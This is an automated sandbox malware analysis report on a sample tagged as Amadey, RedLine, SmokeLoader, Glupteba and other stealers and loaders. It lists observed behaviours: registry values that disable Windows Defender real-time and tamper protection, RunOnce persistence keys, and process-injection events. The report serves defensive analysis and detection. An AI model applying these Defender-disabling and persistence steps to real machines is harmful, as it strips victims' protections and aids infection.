Malware Analysis Report

2025-01-23 08:48

Sample ID 231010-zcwzhabf45
Target file.exe
SHA256 f1fe205719d6a3d54daf0ce295917867a243cbaf4b52a25d605a9991249869c9
Tags
amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat trojan mystic lutyr magia spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f1fe205719d6a3d54daf0ce295917867a243cbaf4b52a25d605a9991249869c9

Threat Level: Known bad

The file file.exe was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat trojan mystic lutyr magia spyware stealer

DcRat

Modifies Windows Defender Real-time Protection settings

Detect Mystic stealer payload

SmokeLoader

RedLine payload

Detects Healer an antivirus disabler dropper

Glupteba payload

Detected google phishing page

Glupteba

RedLine

Healer

SectopRAT payload

Mystic

Amadey

SectopRAT

Stops running service(s)

Downloads MZ/PE file

Modifies Windows Firewall

Reads user/profile data of web browsers

Loads dropped DLL

Windows security modification

Checks computer location settings

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Checks installed software on the system

Suspicious use of SetThreadContext

Launches sc.exe

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 20:34

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 20:34

Reported

2023-10-10 20:54

Platform

win7-20230831-en

Max time kernel

159s

Max time network

185s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat

Detected google phishing page

phishing google

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\A152.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\A152.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\A152.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\A152.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\A152.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\A152.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\894C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\894C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\em6sS5Wk.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\em6sS5Wk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FY0Vk8iU.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FY0Vk8iU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1ZO32QK3.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A568.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CD82.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CD82.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CD82.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CD82.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CD82.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CD82.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\A152.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\A152.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\em6sS5Wk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FY0Vk8iU.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\894C.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WS5OY2lM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\bB1Ol2hS.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2492 set thread context of 2688 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 596 set thread context of 2784 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F0BBCCD1-67AE-11EE-8909-FAA3B8E0C052} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F0D150A1-67AE-11EE-8909-FAA3B8E0C052} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\A152.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4458.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4C07.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3012 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe
PID 3012 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe
PID 3012 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe
PID 3012 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe
PID 3012 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe
PID 3012 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe
PID 3012 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe
PID 2308 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe
PID 2308 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe
PID 2308 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe
PID 2308 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe
PID 2308 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe
PID 2308 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe
PID 2308 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe
PID 2492 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2492 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2492 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2492 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2492 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2492 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2492 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
